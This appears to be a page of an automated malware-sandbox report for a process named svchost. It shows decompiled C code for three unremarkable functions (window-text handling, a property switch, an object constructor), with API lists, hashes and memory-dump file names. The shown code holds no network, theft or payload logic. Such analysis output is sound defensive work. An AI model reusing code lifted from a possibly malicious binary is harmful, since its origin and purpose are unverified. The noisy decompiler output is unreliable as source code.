    Similarity
    • API ID: Color$LongObjectTextWindow
    • String ID:
    • API String ID: 2871169696-0
    • Opcode ID: c991e7d205f50740ca1eeda512537c850dd80f9a50ad46094ddb37b864c6fe7d
    • Instruction ID: c60d0f58e8658631c0d6e0d9dfd32f0930c820a56c3c23e2d05e1883efd39c4f
    • Opcode Fuzzy Hash: c991e7d205f50740ca1eeda512537c850dd80f9a50ad46094ddb37b864c6fe7d
    • Instruction Fuzzy Hash: 23014F30200105BBDF65BF64DD4AAAF3B65EB51310F198923FA02E51E0D774CD94DB69
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0048A7F5 Relevance: 6.0, APIs: 4, Instructions: 29stringCOMMON
    Download Yara Rule
    C-Code - Quality: 37%
    			E0048A7F5(struct HWND__* _a4, CHAR* _a8) {
				char _v260;
				void* _t14;
				void* _t15;

				_t15 =  *0x4922a0(_a8);
				if(_t15 > 0x100 || GetWindowTextA(_a4,  &_v260, 0x100) != _t15) {
					L3:
					return SetWindowTextA(_a4, _a8);
				}
				_t14 =  *0x4921e8( &_v260, _a8);
				if(_t14 != 0) {
					goto L3;
				}
				return _t14;
			}






    0x0048a808
    0x0048a811
    0x0048a83c
    0x00000000
    0x0048a842
    0x0048a832
    0x0048a83a
    0x00000000
    0x00000000
    0x0048a84a

    APIs
    • lstrlen.KERNEL32(?), ref: 0048A802
    • GetWindowTextA.USER32(?,?,00000100), ref: 0048A81E
    • lstrcmp.KERNEL32(?,?), ref: 0048A832
    • SetWindowTextA.USER32(?,?), ref: 0048A842
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: TextWindow$lstrcmplstrlen
    • String ID:
    • API String ID: 330964273-0
    • Opcode ID: 8e7ca9a6d953eec7e64d53873335e36ba026792355cb3a0b71570709f4f91370
    • Instruction ID: a4c17f6407644a08ebcce104e4a9e21521ec9d802d9e84b5c791187faed74faf
    • Opcode Fuzzy Hash: 8e7ca9a6d953eec7e64d53873335e36ba026792355cb3a0b71570709f4f91370
    • Instruction Fuzzy Hash: 56F0F871400018BBDF227F24EC08ADE7B6DEB28391F048073F959E1161D7B4DAA5DBA9
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00419090 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 291COMMON
    Download Yara Rule
    C-Code - Quality: 77%
    			E00419090(void* __ecx, void* __eflags) {
				void* _t122;
				intOrPtr* _t127;
				void* _t129;
				signed int _t145;
				void* _t151;
				intOrPtr _t153;
				void* _t154;

				_push(0xffffffff);
				_push(E0048E758);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t153;
				_t154 = _t153 - 0x58;
				_t122 = E00417F60(__ecx,  *((intOrPtr*)(_t154 + 0x68)), 0);
				_t145 =  *(_t154 + 0x80);
				_t151 = _t122;
				E0040B5D0(_t154 + 0x18);
				 *((intOrPtr*)(_t154 + 0x70)) = 0;
				 *((intOrPtr*)(_t154 + 0x10)) = 0;
				 *((intOrPtr*)(_t154 + 0x14)) = 0;
				if( *((short*)( *((intOrPtr*)(_t151 + 0x28)) + (_t145 + _t145 * 4) * 4 + 0xc)) + 0xfffffc18 > 0x18) {
					L45:
					_t127 =  *((intOrPtr*)(_t151 + 0x2c))(4);
					 *_t127( *((intOrPtr*)(_t154 + 0x7c)), _t145, _t154 + 0x10, 0);
					 *((intOrPtr*)(_t154 + 0x70)) = 0xffffffff;
					 *((intOrPtr*)(_t154 + 0x18)) = 0x495e50;
					_t129 = E0040B7D0(_t154 + 0x18);
					 *[fs:0x0] =  *((intOrPtr*)(_t154 + 0x68));
					return _t129;
				}
				switch( *((intOrPtr*)(0 +  &M00419464))) {
					case 0:
						 *((intOrPtr*)(_t154 + 0x10)) =  *((intOrPtr*)(_t154 + 0x88));
						goto L45;
					case 1:
						__edx =  *(__esp + 0x88);
						__eax =  *(__esp + 0x8c);
						 *(__esp + 0x10) =  *(__esp + 0x88);
						 *(__esp + 0x14) =  *(__esp + 0x8c);
						goto L45;
					case 2:
						__eax =  *(__esp + 0x88);
						__ecx = 0;
						__eflags =  *(__esp + 0x88);
						__ecx = 0 |  *(__esp + 0x88) != 0x00000000;
						 *(__esp + 0x10) = __ecx;
						goto L45;
					case 3:
						__eax =  *(__esp + 0x88);
						__eflags = __eax;
						if(__eax != 0) {
							 *(__esp + 0x10) = __eax;
						} else {
							 *(__esp + 0x10) = 0x4c93a8;
						}
						goto L45;
					case 4:
						__eax =  *(__esp + 0x88);
						__ecx = 0;
						__eflags = __eax;
						0 | __eflags < 0x00000000 = (__eflags < 0) - 1;
						__ecx = (__eflags < 0x00000000) - 0x00000001 & __eax;
						 *(__esp + 0x10) = __ecx;
						goto L45;
					case 5:
						__ecx =  *(__esp + 0x88);
						__eflags = __ecx;
						if(__ecx != 0) {
							__eax =  *(__ecx + 4);
							 *(__esp + 0x14) = __eax;
							__eflags =  *((short*)(__esi + 0xc)) - 0x3f3;
							if( *((short*)(__esi + 0xc)) != 0x3f3) {
								L15:
								__ecx = __ecx + 8;
								 *(__esp + 0x10) = __ecx;
								goto L45;
							}
							__eflags = __eax - 4;
							if(__eax < 4) {
								goto L15;
							}
							__ecx = __ecx + 8;
							_push(__eax);
							__ecx = __esp + 0x20;
							__eax = E0040BD00(__ecx, __ecx);
							__esi =  *(__esp + 0x28);
							__eax =  *(__esp + 0x20);
							__esi =  ~( *(__esp + 0x28));
							asm("sbb esi, esi");
							__esi =  ~( *(__esp + 0x28)) &  *(__esp + 0x20);
							__edx =  *__esi;
							 *__esi = E0041FD60( *__esi);
							 *(__esp + 0x10) = __esi;
							goto L45;
						}
						 *(__esp + 0x10) = 0;
						 *(__esp + 0x14) = 0;
						goto L45;
					case 6:
						__ebx =  *(__esp + 0x84);
						__eflags = __ebx - 0xffffffff;
						if(__ebx == 0xffffffff) {
							__edx =  *(__esp + 0x88);
							__eflags = __edx;
							if(__edx == 0) {
								goto L45;
							}
							__ecx = 0xf;
							__eax = 0;
							__edi = __esp + 0x2c;
							__esi = __edx + 4;
							__eax = memset(__edi, 0, 0xf << 2);
							__edi = __edi + __ecx;
							0 =  *__esi;
							__eax =  *__edx;
							__ecx =  ~( *__esi);
							asm("sbb ecx, ecx");
							__esi = __esi + 4;
							 *(__esp + 0x34) = __eax;
							 *(__esp + 0x38) = __eax;
							__eax =  *__esi;
							__edi =  *(__esi + 4);
							__ecx = __ecx & 0x000002bc;
							__eflags = __eax;
							__edx = __edx & 0xffffff00 | __eax != 0x00000000;
							__esi = __esi + 4;
							 *(__esp + 0x3c) = __ecx;
							__eflags = __edi;
							__ecx =  *(__esi + 4);
							 *((char*)(__esp + 0x40)) = __dl;
							__eax = __eax & 0xffffff00 | __edi != 0x00000000;
							__esi = __esi + 4;
							 *((char*)(__esp + 0x42)) = __al;
							__eflags = __ecx;
							__eax =  *(__esi + 4);
							__ecx = __ecx & 0xffffff00 | __ecx != 0x00000000;
							__esi = __esi + 4;
							__edx = 0;
							__eflags = __eax;
							__edx = 0 | __eflags < 0x00000000;
							__edx = (__eflags < 0) - 1;
							 *((char*)(__esp + 0x41)) = __cl;
							_push(__eax);
							__eax = __esp + 0x30;
							_push(__esp + 0x30);
							__eax = E00420460(__edx, __eflags);
							__esi = __esi + 4;
							__esp = __esp + 8;
							__esi =  *__esi;
							__eflags = __esi;
							if(__esi == 0) {
								L41:
								__edx = __esp + 0x48;
								__edi = 0x4aceb4;
								L42:
								__ecx = __ecx | 0xffffffff;
								__eax = 0;
								asm("repne scasb");
								__ecx =  !__ecx;
								__edi = __edi - __ecx;
								__eflags = __edi;
								__esi = __edi;
								__eax = __ecx;
								__edi = __edx;
								L43:
								__ecx = __ecx >> 2;
								__eax = memcpy(__edi, __esi, __ecx << 2);
								__edi = __esi + __ecx;
								__edi = __esi + __ecx + __ecx;
								0 = __eax;
								__ecx = __eax & 0x00000003;
								__eflags = __ecx;
								__eax = memcpy(__edi, __esi, __ecx);
								__esi + __ecx = __esi + __ecx + __ecx;
								__ecx = 0;
								L44:
								__edi =  *(__esp + 0x80);
								__ecx = __esp + 0x2c;
								 *(__esp + 0x10) = __ecx;
								 *(__esp + 0x14) = 0x3c;
								goto L45;
							}
							__eax = E0040C020(__ecx, __esi);
							__eflags = __eax - 0x20;
							if(__eax >= 0x20) {
								goto L41;
							}
							__edx = __esp + 0x48;
							__edi = __esi;
							goto L42;
						}
						_push(6);
						__eax =  *((intOrPtr*)(__ebp + 0x2c))();
						__edx =  *(__esp + 0x7c);
						__ecx = __esp + 0x10;
						_push(__ecx);
						_push(__edi);
						_push(__edx);
						__eax =  *__eax();
						__eflags = __eax;
						if(__eax == 0) {
							L20:
							__eax = __esp + 0x2c;
							GetStockObject(0x11) = GetObjectA(__eax, 0x3c, __esp + 0x2c);
							L21:
							__eflags = __ebx - 6;
							if(__ebx > 6) {
								goto L44;
							}
							switch( *((intOrPtr*)(__ebx * 4 +  &M004194A0))) {
								case 0:
									__eax =  *(__esp + 0x88);
									__ecx = 0xe10;
									asm("cdq");
									_t59 = __eax % 0xe10;
									__eax = __eax / 0xe10;
									__edx = _t59;
									__eflags = __edx;
									if(__edx < 0) {
										__edx = __edx + 0xe10;
										__eflags = __edx;
									}
									 *(__esp + 0x34) = __edx;
									 *(__esp + 0x38) = __edx;
									goto L44;
								case 1:
									 *(__esp + 0x88) =  ~( *(__esp + 0x88));
									asm("sbb edx, edx");
									__edx =  ~( *(__esp + 0x88)) & 0x000002bc;
									 *(__esp + 0x3c) =  ~( *(__esp + 0x88)) & 0x000002bc;
									goto L44;
								case 2:
									__eax =  *(__esp + 0x88);
									__eflags = __eax;
									__eax = __eax & 0xffffff00 | __eax != 0x00000000;
									 *((char*)(__esp + 0x40)) = __al;
									goto L44;
								case 3:
									__eax =  *(__esp + 0x88);
									__eflags =  *(__esp + 0x88);
									__ecx = __ecx & 0xffffff00 |  *(__esp + 0x88) != 0x00000000;
									 *((char*)(__esp + 0x42)) = __cl;
									goto L44;
								case 4:
									__eax =  *(__esp + 0x88);
									__eflags =  *(__esp + 0x88);
									__edx = __edx & 0xffffff00 |  *(__esp + 0x88) != 0x00000000;
									 *((char*)(__esp + 0x41)) = __dl;
									goto L44;
								case 5:
									__eax =  *(__esp + 0x88);
									__ecx = 0;
									__eflags = __eax;
									0 | __eflags < 0x00000000 = (__eflags < 0) - 1;
									__edx = __esp + 0x2c;
									__ecx = (__eflags < 0x00000000) - 0x00000001 & __eax;
									_push((__eflags < 0x00000000) - 0x00000001 & __eax);
									_push(__edx);
									__eax = E00420460(__edx, __eflags);
									__esp = __esp + 8;
									goto L44;
								case 6:
									__edx =  *(__esp + 0x88);
									__eflags = __edx;
									if(__edx == 0) {
										__edx = 0x4c93a8;
									}
									__edi = __edx;
									__ecx = __ecx | 0xffffffff;
									__eax = 0;
									asm("repne scasb");
									__ecx =  !__ecx;
									__ecx = __ecx - 1;
									__eflags = __ecx;
									if(__ecx <= 0) {
										L35:
										__edx = 0x4aceb4;
										goto L36;
									} else {
										__eflags = __ecx - 0x20;
										if(__ecx < 0x20) {
											L36:
											__edi = __edx;
											__ecx = __ecx | 0xffffffff;
											__eax = 0;
											__ebx = __esp + 0x48;
											asm("repne scasb");
											__ecx =  !__ecx;
											__edi = __edx - __ecx;
											__esi = __edx - __ecx;
											__eax = __ecx;
											__edi = __esp + 0x48;
											goto L43;
										}
										goto L35;
									}
							}
						}
						__eflags =  *(__esp + 0x14) - 0x3c;
						if( *(__esp + 0x14) != 0x3c) {
							goto L20;
						}
						__esi =  *(__esp + 0x10);
						__ecx = 0xf;
						__edi = __esp + 0x2c;
						__eax = memcpy(__esp + 0x2c, __esi, 0xf << 2);
						__esi + __ecx = __esi + __ecx + __ecx;
						__ecx = 0;
						goto L21;
					case 7:
						__ecx =  *(__esp + 0x88);
						 *(__esp + 0x10) = __ecx;
						goto L45;
				}
			}










    0x00419090
    0x00419092
    0x0041909d
    0x0041909e
    0x004190a5
    0x004190b4
    0x004190b9
    0x004190c0
    0x004190cf
    0x004190d6
    0x004190da
    0x004190de
    0x004190ee
    0x00419422
    0x00419424
    0x00419434
    0x0041943a
    0x00419442
    0x0041944a
    0x00419457
    0x00419461
    0x00419461
    0x004190fc
    0x00000000
    0x0041910a
    0x00000000
    0x00000000
    0x00419144
    0x0041914b
    0x00419152
    0x00419156
    0x00000000
    0x00000000
    0x0041912d
    0x00419134
    0x00419136
    0x00419138
    0x0041913b
    0x00000000
    0x00000000
    0x0041916f
    0x00419176
    0x00419178
    0x00419187
    0x0041917a
    0x0041917a
    0x0041917a
    0x00000000
    0x00000000
    0x00419113
    0x0041911a
    0x0041911c
    0x00419121
    0x00419122
    0x00419124
    0x00000000
    0x00000000
    0x00419190
    0x00419197
    0x00419199
    0x004191a8
    0x004191ab
    0x004191af
    0x004191b5
    0x004191ee
    0x004191ee
    0x004191f1
    0x00000000
    0x004191f1
    0x004191b7
    0x004191ba
    0x00000000
    0x00000000
    0x004191bc
    0x004191bf
    0x004191c1
    0x004191c5
    0x004191ca
    0x004191ce
    0x004191d2
    0x004191d4
    0x004191d6
    0x004191d8
    0x004191e0
    0x004191e5
    0x00000000
    0x004191e5
    0x0041919b
    0x0041919f
    0x00000000
    0x00000000
    0x004191fa
    0x00419201
    0x00419204
    0x00419343
    0x0041934a
    0x0041934c
    0x00000000
    0x00000000
    0x00419352
    0x00419357
    0x00419359
    0x0041935d
    0x00419360
    0x00419360
    0x00419362
    0x00419364
    0x00419366
    0x00419368
    0x0041936a
    0x0041936d
    0x00419371
    0x00419375
    0x00419377
    0x0041937a
    0x00419380
    0x00419382
    0x00419385
    0x00419388
    0x0041938c
    0x0041938e
    0x00419391
    0x00419395
    0x00419398
    0x0041939b
    0x0041939f
    0x004193a1
    0x004193a4
    0x004193a7
    0x004193aa
    0x004193ac
    0x004193ae
    0x004193b1
    0x004193b2
    0x004193b8
    0x004193b9
    0x004193bd
    0x004193be
    0x004193c3
    0x004193c6
    0x004193c9
    0x004193cb
    0x004193cd
    0x004193e5
    0x004193e5
    0x004193e9
    0x004193ee
    0x004193ee
    0x004193f1
    0x004193f3
    0x004193f5
    0x004193f7
    0x004193f7
    0x004193f9
    0x004193fb
    0x004193fd
    0x004193ff
    0x004193ff
    0x00419402
    0x00419402
    0x00419402
    0x00419404
    0x00419406
    0x00419406
    0x00419409
    0x00419409
    0x00419409
    0x0041940b
    0x0041940b
    0x00419412
    0x00419416
    0x0041941a
    0x00000000
    0x0041941a
    0x004193d0
    0x004193d8
    0x004193db
    0x00000000
    0x00000000
    0x004193dd
    0x004193e1
    0x00000000
    0x004193e1
    0x0041920a
    0x0041920c
    0x0041920f
    0x00419213
    0x00419217
    0x00419218
    0x00419219
    0x0041921a
    0x0041921c
    0x0041921e
    0x00419238
    0x00419238
    0x00419248
    0x0041924e
    0x0041924e
    0x00419251
    0x00000000
    0x00000000
    0x00419257
    0x00000000
    0x0041925e
    0x00419265
    0x0041926a
    0x0041926b
    0x0041926b
    0x0041926b
    0x0041926d
    0x0041926f
    0x00419271
    0x00419271
    0x00419271
    0x00419273
    0x00419277
    0x00000000
    0x00000000
    0x00419287
    0x00419289
    0x0041928b
    0x00419291
    0x00000000
    0x00000000
    0x0041929a
    0x004192a1
    0x004192a3
    0x004192a6
    0x00000000
    0x00000000
    0x004192af
    0x004192b6
    0x004192b8
    0x004192bb
    0x00000000
    0x00000000
    0x004192c4
    0x004192cb
    0x004192cd
    0x004192d0
    0x00000000
    0x00000000
    0x004192d9
    0x004192e0
    0x004192e2
    0x004192e7
    0x004192e8
    0x004192ec
    0x004192ee
    0x004192ef
    0x004192f0
    0x004192f5
    0x00000000
    0x00000000
    0x004192fd
    0x00419304
    0x00419306
    0x00419308
    0x00419308
    0x0041930d
    0x0041930f
    0x00419312
    0x00419314
    0x00419316
    0x00419318
    0x00419319
    0x0041931b
    0x00419322
    0x00419322
    0x00000000
    0x0041931d
    0x0041931d
    0x00419320
    0x00419327
    0x00419327
    0x00419329
    0x0041932c
    0x0041932e
    0x00419332
    0x00419334
    0x00419336
    0x00419338
    0x0041933a
    0x0041933c
    0x00000000
    0x0041933c
    0x00000000
    0x00419320
    0x00000000
    0x00419257
    0x00419220
    0x00419225
    0x00000000
    0x00000000
    0x00419227
    0x0041922b
    0x00419230
    0x00419234
    0x00419234
    0x00419234
    0x00000000
    0x00000000
    0x0041915f
    0x00419166
    0x00000000
    0x00000000

    Strings
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID:
    • String ID: <
    • API String ID: 0-4251816714
    • Opcode ID: 71fd6dbcf1554d1fff94cecde06319b6cc37daa3b6e6919ac9eea0c471f262a1
    • Instruction ID: 3a40b3e054403b7abf586a1d7e608c87f9994c74dbdcf85384208a99a2f24902
    • Opcode Fuzzy Hash: 71fd6dbcf1554d1fff94cecde06319b6cc37daa3b6e6919ac9eea0c471f262a1
    • Instruction Fuzzy Hash: 25B195715087419FD728CF24D890AABB7E5BBC5310F148A2EF59AD7380DB34DD468B86
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00414900 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 162COMMON
    Download Yara Rule
    C-Code - Quality: 95%
    			E00414900(intOrPtr* __ecx, void* __ebp) {
				char _v8;
				intOrPtr* _v16;
				intOrPtr _v20;
				intOrPtr _t85;
				intOrPtr _t97;
				void* _t114;
				intOrPtr* _t115;
				intOrPtr* _t116;
				intOrPtr* _t117;
				intOrPtr* _t118;
				intOrPtr* _t119;
				intOrPtr* _t120;
				intOrPtr* _t121;
				intOrPtr* _t122;
				intOrPtr* _t123;
				intOrPtr* _t124;
				intOrPtr* _t125;
				intOrPtr* _t127;
				intOrPtr* _t128;
				intOrPtr _t131;
				intOrPtr _t143;
				intOrPtr _t159;
				void* _t160;
				void* _t163;
				intOrPtr* _t164;
				intOrPtr _t167;

				 *[fs:0x0] = _t167;
				_t164 = __ecx;
				_v16 = __ecx;
				E0048CDC2(__ecx, 0, 0);
				_t85 =  *0x4b8924; // 0x4b8938
				_v8 = 0;
				 *((intOrPtr*)(__ecx + 0xd0)) = _t85;
				_t131 =  *0x4b8924; // 0x4b8938
				 *((intOrPtr*)(__ecx + 0xd4)) = _t131;
				_t159 =  *0x4b8924; // 0x4b8938
				 *((intOrPtr*)(__ecx + 0xd8)) = _t159;
				_v8 = 3;
				E004823A4(__ecx + 0xdc);
				_v8 = 4;
				E004823A4(__ecx + 0xf0);
				E0040B5D0(__ecx + 0x10c);
				 *((intOrPtr*)(__ecx + 0x108)) = 0;
				 *((intOrPtr*)(__ecx + 0x104)) = 0x496038;
				_t115 = __ecx + 0x120;
				E0040B5D0(_t115);
				 *_t115 = 0x495ea0;
				_t116 = __ecx + 0x134;
				E0040B5D0(_t116);
				 *_t116 = 0x495ea0;
				_t117 = __ecx + 0x148;
				E0040B5D0(_t117);
				 *_t117 = 0x495ea0;
				_t118 = __ecx + 0x15c;
				E0040B5D0(_t118);
				 *_t118 = 0x495ea0;
				_t119 = __ecx + 0x170;
				E0040B5D0(_t119);
				 *_t119 = 0x495ea0;
				_t120 = __ecx + 0x184;
				E0040B5D0(_t120);
				 *_t120 = 0x495ea0;
				_t121 = __ecx + 0x1a0;
				E0040B5D0(_t121);
				 *_t121 = 0x495ea0;
				_v8 = 0xd;
				E004823A4(__ecx + 0x1b4);
				_t97 =  *0x4b8924; // 0x4b8938
				 *((intOrPtr*)(__ecx + 0x1cc)) = _t97;
				_t143 =  *0x4b8924; // 0x4b8938
				 *((intOrPtr*)(__ecx + 0x1d0)) = _t143;
				_t122 = __ecx + 0x1ec;
				E0040B5D0(_t122);
				 *_t122 = 0x495ea0;
				_t123 = __ecx + 0x200;
				E0040B5D0(_t123);
				 *_t123 = 0x495ea0;
				_t124 = __ecx + 0x214;
				E0040B5D0(_t124);
				 *_t124 = 0x495ea0;
				_t125 = __ecx + 0x22c;
				E0040B5D0(_t125);
				 *_t125 = 0x495ea0;
				E0040B5D0(__ecx + 0x240);
				E0040B5D0(__ecx + 0x254);
				E0040B5D0(__ecx + 0x268);
				E0040B5D0(__ecx + 0x290);
				_v8 = 0x18;
				E00427F20(__ecx + 0x2a4);
				_v8 = 0x19;
				E00433C80(__ecx + 0x354);
				 *((intOrPtr*)(_t164 + 0x374)) = 0;
				 *((intOrPtr*)(_t164 + 0x370)) = 0x496034;
				 *((intOrPtr*)(_t164 + 0x378)) = 0;
				 *((intOrPtr*)(_t164 + 0x37c)) = 0;
				 *((intOrPtr*)(_t164 + 0x384)) = 0x496034;
				 *((intOrPtr*)(_t164 + 0x388)) = 0;
				 *((intOrPtr*)(_t164 + 0x38c)) = 0;
				 *((intOrPtr*)(_t164 + 0x390)) = 0;
				_v8 = 0x1c;
				E0042A4D0(_t164 + 0x394);
				_v8 = 0x1d;
				E00482344(_t164 + 0x3a4);
				 *((intOrPtr*)(_t164 + 0x3b8)) = 0x496034;
				 *((intOrPtr*)(_t164 + 0x3bc)) = 0;
				 *((intOrPtr*)(_t164 + 0x3c0)) = 0;
				 *((intOrPtr*)(_t164 + 0x3c4)) = 0;
				_t127 = _t164 + 0x3c8;
				_v8 = 0x1f;
				E00484873(_t127);
				 *_t127 = 0x495f7c;
				_t128 = _t164 + 0x410;
				E0040B5D0(_t128);
				 *_t128 = 0x495ea0;
				 *_t164 = 0x495ee0;
				 *((intOrPtr*)(_t164 + 0x108)) = _t164;
				 *((intOrPtr*)(_t164 + 0x19c)) = 0;
				 *((intOrPtr*)(_t164 + 0x198)) = 0;
				 *((intOrPtr*)(_t164 + 0x428)) = 0;
				 *((intOrPtr*)(_t164 + 0x424)) = 0;
				 *((intOrPtr*)(_t164 + 0x1d4)) = 0;
				 *((intOrPtr*)(_t164 + 0x1d8)) = 0;
				 *((intOrPtr*)(_t164 + 0x1e0)) = 0;
				 *((intOrPtr*)(_t164 + 0x1dc)) = 0;
				 *((intOrPtr*)(_t164 + 0x1e8)) = 0;
				 *((intOrPtr*)(_t164 + 0x1e4)) = 0;
				 *((intOrPtr*)(_t164 + 0x280)) = 0;
				 *((intOrPtr*)(_t164 + 0x27c)) = 0;
				 *((intOrPtr*)(_t164 + 0x284)) = 0;
				 *((intOrPtr*)(_t164 + 0x28c)) = 0;
				 *((intOrPtr*)(_t164 + 0x288)) = 0;
				 *((intOrPtr*)(_t164 + 0x380)) = 0;
				 *((intOrPtr*)(_t164 + 0x3a0)) = 0;
				 *((intOrPtr*)(_t164 + 0x404)) = 0;
				 *((intOrPtr*)(_t164 + 0x408)) = 0;
				 *((intOrPtr*)(_t164 + 0x40c)) = 0;
				 *((intOrPtr*)(_t164 + 0xc4)) = 0;
				 *((intOrPtr*)(_t164 + 0xc8)) = 0;
				 *((intOrPtr*)(_t164 + 0xcc)) = 0;
				 *((intOrPtr*)(_t164 + 0x228)) = 0;
				 *((intOrPtr*)(_t164 + 0x42c)) = 0;
				 *((intOrPtr*)(_t164 + 0x1c8)) = 0;
				 *0x492298(0x4c9e70, _t160, _t163, _t114, __ecx,  *[fs:0x0], E0048E40A, 0xffffffff);
				 *[fs:0x0] = _v20;
				return _t164;
			}





























    0x0041490e
    0x0041491b
    0x0041491e
    0x00414922
    0x00414927
    0x0041492c
    0x00414930
    0x00414936
    0x0041493c
    0x00414942
    0x00414948
    0x00414954
    0x00414959
    0x00414964
    0x00414969
    0x00414974
    0x00414979
    0x0041497f
    0x00414989
    0x00414991
    0x00414996
    0x0041499c
    0x004149a4
    0x004149a9
    0x004149af
    0x004149b7
    0x004149bc
    0x004149c2
    0x004149ca
    0x004149cf
    0x004149d5
    0x004149dd
    0x004149e2
    0x004149e8
    0x004149f0
    0x004149f5
    0x004149fb
    0x00414a03
    0x00414a08
    0x00414a14
    0x00414a19
    0x00414a1e
    0x00414a23
    0x00414a29
    0x00414a2f
    0x00414a35
    0x00414a3d
    0x00414a42
    0x00414a48
    0x00414a50
    0x00414a55
    0x00414a5b
    0x00414a63
    0x00414a68
    0x00414a6e
    0x00414a76
    0x00414a7b
    0x00414a87
    0x00414a92
    0x00414a9d
    0x00414aa8
    0x00414ab3
    0x00414ab8
    0x00414ac3
    0x00414ac8
    0x00414ad2
    0x00414ad8
    0x00414ade
    0x00414ae4
    0x00414aea
    0x00414af0
    0x00414af6
    0x00414afc
    0x00414b08
    0x00414b0d
    0x00414b18
    0x00414b1d
    0x00414b22
    0x00414b28
    0x00414b2e
    0x00414b34
    0x00414b3a
    0x00414b40
    0x00414b47
    0x00414b4c
    0x00414b52
    0x00414b5a
    0x00414b5f
    0x00414b65
    0x00414b6b
    0x00414b71
    0x00414b77
    0x00414b7d
    0x00414b83
    0x00414b89
    0x00414b8f
    0x00414b95
    0x00414b9b
    0x00414ba1
    0x00414ba7
    0x00414bb2
    0x00414bb8
    0x00414bbe
    0x00414bc4
    0x00414bca
    0x00414bd0
    0x00414bd6
    0x00414bdc
    0x00414be2
    0x00414be8
    0x00414bee
    0x00414bf4
    0x00414bfa
    0x00414c00
    0x00414c06
    0x00414c0c
    0x00414c12
    0x00414c21
    0x00414c2b

    APIs
      • Part of subcall function 0048CDC2: __EH_prolog.LIBCMT ref: 0048CDC7
      • Part of subcall function 0048CDC2: GetCurrentThread.KERNEL32 ref: 0048CE15
      • Part of subcall function 0048CDC2: GetCurrentThreadId.KERNEL32 ref: 0048CE1E
      • Part of subcall function 00427F20: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,0041AA38), ref: 00427F95
    • RtlInitializeCriticalSection.NTDLL(004C9E70), ref: 00414C12
    Strings
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: CurrentThread$CreateCriticalEventH_prologInitializeSection
    • String ID: MA$^I
    • API String ID: 1775145326-2701824691
